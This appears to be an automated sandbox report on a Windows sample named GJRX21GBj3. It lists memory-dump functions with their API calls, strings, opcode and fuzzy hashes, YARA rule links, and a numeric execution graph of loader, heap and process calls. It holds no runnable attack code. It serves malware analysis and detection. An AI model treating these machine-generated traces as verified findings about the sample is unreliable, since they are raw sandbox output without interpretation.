                                                • Opcode ID: 66f69495e65e7569fab1ee3eca8218c4ab18840aceecc73612b5da8ed725d5cc
                                                • Instruction ID: 507169d04699c528efe726d42bf7c0d5ccd1f638a9ff08947bbea21bdbb06524
                                                • Opcode Fuzzy Hash: 66f69495e65e7569fab1ee3eca8218c4ab18840aceecc73612b5da8ed725d5cc
                                                • Instruction Fuzzy Hash: BA519F35A0974281EBA4DF35E8542B963A1EF88B94F481235C96EE7F94DF3CD806C704
                                                Function 00007FF658552C07 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 142librarythreadloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                • API String ID: 2652322181-269241671
                                                • Opcode ID: b037745baa6da5cfcea9aa83ba2a3fcd93fe532d42f2725a16f9f08e5f2abdaf
                                                • Instruction ID: 5a677f2e78c7ed19915fda2ec13a5fcde4cc868f267dba101ee21e5dcde8ca43
                                                • Opcode Fuzzy Hash: b037745baa6da5cfcea9aa83ba2a3fcd93fe532d42f2725a16f9f08e5f2abdaf
                                                • Instruction Fuzzy Hash: D1519D34A0974281EBA4DF31E8642B963A1EF88B94F480135C95EE7F94DF3CD806C704
                                                Function 00007FF65855D7A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D7DE
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D806
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D826
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D846
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D866
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D88A
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D8AE
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D8D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: strcmp
                                                • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                • API String ID: 1004003707-945519297
                                                • Opcode ID: 197e38a6a36c6bb4220fbaead1b9f78f8d00f9fc7e04546cb49c79d4988069bc
                                                • Instruction ID: d2e3f6ad8a678db2b5bd4514f28e940a3d9fd115224802f468766190b0ab904c
                                                • Opcode Fuzzy Hash: 197e38a6a36c6bb4220fbaead1b9f78f8d00f9fc7e04546cb49c79d4988069bc
                                                • Instruction Fuzzy Hash: 33412C25E08B4240FA94A739A95027912A2AF517F4F4C0371D87DB7ED9EF2CE946D708
                                                Function 00007FF65855C770 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                • String ID: InitializeContext2$kernel32.dll
                                                • API String ID: 4102459504-3117029998
                                                • Opcode ID: e6c972ee89a253928001caa749724e57dab32ad1c9570b43b651811b21d24b24
                                                • Instruction ID: 8e5ab6fbf97ef4a5d5ab72db9edf576f44e5e4a537f5cc3456ae1174dc8cd1cb
                                                • Opcode Fuzzy Hash: e6c972ee89a253928001caa749724e57dab32ad1c9570b43b651811b21d24b24
                                                • Instruction Fuzzy Hash: CE319E71A19B5682EB40DB71A440279A390FF84BA0F4C0435DD5DA7FA4EF7CE886D708
                                                Function 00007FF658552FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                • String ID:
                                                • API String ID: 510365852-3916222277
                                                • Opcode ID: 1332bfa6df53277a3ccedc8723911591ab112e322b4924b62ab04042915ed568
                                                • Instruction ID: c6487d54c79b9bb21bf95a89299591d64dba43c674495b7dbfd4679c55d92d29
                                                • Opcode Fuzzy Hash: 1332bfa6df53277a3ccedc8723911591ab112e322b4924b62ab04042915ed568
                                                • Instruction Fuzzy Hash: 53119F72A08B818ADBA0EF65F4401DAB350FB457B4F180334E6BE5BAD6CF38D5428B44
                                                Function 00007FF658587820 Relevance: 7.6, APIs: 6, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: f53b0cf296a2f0a884e1fd4cc14872174b3daa9af663874dfa4f6200fc7a1855
                                                • Instruction ID: e8db1053603b4b3d2e99d73021f1ccdfbdfe4ae9911114fe4d79504ced1d6e8a
                                                • Opcode Fuzzy Hash: f53b0cf296a2f0a884e1fd4cc14872174b3daa9af663874dfa4f6200fc7a1855
                                                • Instruction Fuzzy Hash: 9A615A21A59B8684EA908F31EC802B963A5FF85790F5D1132D99EB3F65DF3CE045CB48
                                                Function 00007FF658582B50 Relevance: 7.6, APIs: 6, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: cc348131d89d10fcdaa60efc61662731d4453f357470223f95077c9bab94ee90
                                                • Instruction ID: 1012eb27a286ce62a13e363ff98f88b84067c847e3d6a1f682c3c7176197a51f
                                                • Opcode Fuzzy Hash: cc348131d89d10fcdaa60efc61662731d4453f357470223f95077c9bab94ee90
                                                • Instruction Fuzzy Hash: 06514B25A58B8681EAA09F31EC403B977A4FF85790F9D0136C99EA3F55DF3CE0458B08
                                                Function 00007FF658553A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise
                                                • String ID: Process is terminating due to StackOverflowException.
                                                • API String ID: 2546344036-2200901744
                                                • Opcode ID: 9d7b98e1c26a9380dc8d41e070e364fbb808deaa013c945634dfd4d3c0b2d453
                                                • Instruction ID: 041bb661a79e9d34b8fe19a9df9233c002c62584542dd56d7556a635f07d5d18
                                                • Opcode Fuzzy Hash: 9d7b98e1c26a9380dc8d41e070e364fbb808deaa013c945634dfd4d3c0b2d453
                                                • Instruction Fuzzy Hash: 52518421B09B4291EE949B29E4903F96790EF59B90F4C4035DB1EE7FA1DF2CE495C308
                                                Function 00007FF658591540 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: d00efbbb26263cc08ad4df3913b4dcfaa6276e0511a9266e1d0ba80b3ed15afd
                                                • Instruction ID: 49fbee48494c3bab371b714319d51774476b68ea79d93b2d319b35b41dfea992
                                                • Opcode Fuzzy Hash: d00efbbb26263cc08ad4df3913b4dcfaa6276e0511a9266e1d0ba80b3ed15afd
                                                • Instruction Fuzzy Hash: 724181B2B8965686EBE09E35D0406397290EB40BD4F5C8139DA0FD6EC9DE3CE840CB48
                                                Function 00007FF65855C8E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C914
                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C91E
                                                • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C93D
                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF658553141), ref: 00007FF65855C951
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ErrorLastMultipleWait$HandlesObjects
                                                • String ID:
                                                • API String ID: 2817213684-0
                                                • Opcode ID: 3f11a659937ca2a9d2f58ed7fb8769b284d6cf253c5c6821f0f42326241e4d41
                                                • Instruction ID: fc6acf97986f076122591508defecf5fe0335b6bbed27705363a65cc906b6808
                                                • Opcode Fuzzy Hash: 3f11a659937ca2a9d2f58ed7fb8769b284d6cf253c5c6821f0f42326241e4d41
                                                • Instruction Fuzzy Hash: CA112E31B08B56C2E7648B36B44152AB275FB44B90F184139EADDA7FD9CF3CE8408B48
                                                Function 00007FF6585B26D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6585B19E3), ref: 00007FF6585B2720
                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6585B19E3), ref: 00007FF6585B2761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 0ffc842e3cd9d8863173c70d516709e896315b3aa4b438e39af49301c1c78a26
                                                • Instruction ID: c23414b2b0c879661698d84f29695e9209bc2e29b358819cecdd19215e2e2074
                                                • Opcode Fuzzy Hash: 0ffc842e3cd9d8863173c70d516709e896315b3aa4b438e39af49301c1c78a26
                                                • Instruction Fuzzy Hash: D4115B32618B8082EB618F25E40026A77E1FB88B84F584235DF8D57B58EF3CC555CB08
                                                Function 00007FF65855E0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF65855D913,?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855E0EB
                                                • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF65855D913,?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855E128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: _stricmpstrtoull
                                                • String ID: HeapVerify
                                                • API String ID: 4031153986-2674988305
                                                • Opcode ID: 76587d0a3d7f317c46cd9241e9b139c3ad74e0b9b9e742cb6b28ded029d14747
                                                • Instruction ID: dd03101b5863a0369aeb1147824f60ac2b7e5871a365d4a4758de22063a3f59b
                                                • Opcode Fuzzy Hash: 76587d0a3d7f317c46cd9241e9b139c3ad74e0b9b9e742cb6b28ded029d14747
                                                • Instruction Fuzzy Hash: B3017571A09A42CAEB909F36E9800797365FB447C0F5C9135EA9D93F59DF3CE541C608
                                                Function 00007FF658575640 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF65857568D
                                                • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF6585756E2
                                                • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF6585756FF
                                                • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6585757BF,?,?,?,00007FF658582F8B), ref: 00007FF65857571C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: dc4647aee6fef599a95d088791b2164ab4126b57bf50acce3f02ed7a20a5dc51
                                                • Instruction ID: 5d4a69c93188db7e9c0c924e47da04c12efb82b70911e01e1f8b178a6572b53b
                                                • Opcode Fuzzy Hash: dc4647aee6fef599a95d088791b2164ab4126b57bf50acce3f02ed7a20a5dc51
                                                • Instruction Fuzzy Hash: F621B221A58A4682EA508F31FC502B923A5EF05BE0F8D5235D96EA3F95CF2CE149C348

                                                Execution Graph

                                                Execution Coverage:1.4%
                                                Dynamic/Decrypted Code Coverage:4.9%
                                                Signature Coverage:9.2%
                                                Total number of Nodes:142
                                                Total number of Limit Nodes:10
                                                execution_graph 78286 424743 78287 424752 78286->78287 78288 424799 78287->78288 78291 4247da 78287->78291 78293 4247df 78287->78293 78294 42d463 78288->78294 78292 42d463 RtlFreeHeap 78291->78292 78292->78293 78297 42b903 78294->78297 78296 4247a9 78298 42b920 78297->78298 78299 42b931 RtlFreeHeap 78298->78299 78299->78296 78300 42e543 78301 42e553 78300->78301 78302 42e559 78300->78302 78305 42d543 78302->78305 78304 42e57f 78308 42b8b3 78305->78308 78307 42d55e 78307->78304 78309 42b8d0 78308->78309 78310 42b8e1 RtlAllocateHeap 78309->78310 78310->78307 78311 42abc3 78312 42abdd 78311->78312 78315 58c2df0 LdrInitializeThunk 78312->78315 78313 42ac05 78315->78313 78436 4243b3 78437 4243cf 78436->78437 78438 4243f7 78437->78438 78439 42440b 78437->78439 78440 42b593 NtClose 78438->78440 78441 42b593 NtClose 78439->78441 78442 424400 78440->78442 78443 424414 78441->78443 78446 42d583 RtlAllocateHeap 78443->78446 78445 42441f 78446->78445 78316 41b083 78317 41b0c7 78316->78317 78318 41b0e8 78317->78318 78320 42b593 78317->78320 78321 42b5b0 78320->78321 78322 42b5c1 NtClose 78321->78322 78322->78318 78323 41e183 78324 41e1a9 78323->78324 78328 41e291 78324->78328 78329 42e673 78324->78329 78326 41e238 78326->78328 78335 42ac13 78326->78335 78330 42e5e3 78329->78330 78331 42e640 78330->78331 78332 42d543 RtlAllocateHeap 78330->78332 78331->78326 78333 42e61d 78332->78333 78334 42d463 RtlFreeHeap 78333->78334 78334->78331 78336 42ac30 78335->78336 78339 58c2c0a 78336->78339 78337 42ac5c 78337->78328 78340 58c2c1f LdrInitializeThunk 78339->78340 78341 58c2c11 78339->78341 78340->78337 78341->78337 78447 414093 78448 41409a 78447->78448 78453 417a33 78448->78453 78450 4140c8 78451 41410d 78450->78451 78452 4140fc PostThreadMessageW 78450->78452 78452->78451 78455 417a57 78453->78455 78454 417a5e 78454->78450 78455->78454 78457 417a7d 78455->78457 78460 42e923 LdrLoadDll 78455->78460 78458 417a93 LdrLoadDll 78457->78458 78459 417aaa 78457->78459 78458->78459 78459->78450 78460->78457 78342 401be9 78343 401bf0 78342->78343 78346 42ea03 78343->78346 78344 401c29 78344->78344 78349 42d053 78346->78349 78350 42d079 78349->78350 78361 407613 78350->78361 78352 42d0e0 78352->78344 78353 42d08f 78353->78352 78365 41ae93 78353->78365 78355 42d0ae 78356 42d0c3 78355->78356 78380 42b953 78355->78380 78376 427653 78356->78376 78359 42d0d2 78360 42b953 ExitProcess 78359->78360 78360->78352 78362 407614 78361->78362 78383 416763 78362->78383 78364 407620 78364->78353 78366 41aebf 78365->78366 78397 41ad83 78366->78397 78369 41af04 78372 42b593 NtClose 78369->78372 78373 41af20 78369->78373 78370 41aeec 78371 42b593 NtClose 78370->78371 78374 41aef7 78370->78374 78371->78374 78375 41af16 78372->78375 78373->78355 78374->78355 78375->78355 78377 4276ad 78376->78377 78379 4276ba 78377->78379 78408 418583 78377->78408 78379->78359 78381 42b970 78380->78381 78382 42b981 ExitProcess 78381->78382 78382->78356 78384 41677a 78383->78384 78386 4167a7 78384->78386 78388 416793 78384->78388 78396 42a503 RtlFreeHeap LdrInitializeThunk 78384->78396 78389 42bfe3 78386->78389 78388->78364 78390 42bffb 78389->78390 78391 42c01f 78390->78391 78392 42ac13 LdrInitializeThunk 78390->78392 78391->78388 78393 42c074 78392->78393 78394 42d463 RtlFreeHeap 78393->78394 78395 42c08d 78394->78395 78395->78388 78396->78386 78398 41ad9d 78397->78398 78402 41ae79 78397->78402 78403 42acb3 78398->78403 78401 42b593 NtClose 78401->78402 78402->78369 78402->78370 78404 42accd 78403->78404 78407 58c35c0 LdrInitializeThunk 78404->78407 78405 41ae6d 78405->78401 78407->78405 78409 4185ad 78408->78409 78415 418a1b 78409->78415 78416 4141b3 78409->78416 78411 4186ba 78412 42d463 RtlFreeHeap 78411->78412 78411->78415 78413 4186d2 78412->78413 78414 42b953 ExitProcess 78413->78414 78413->78415 78414->78415 78415->78379 78423 4141cf 78416->78423 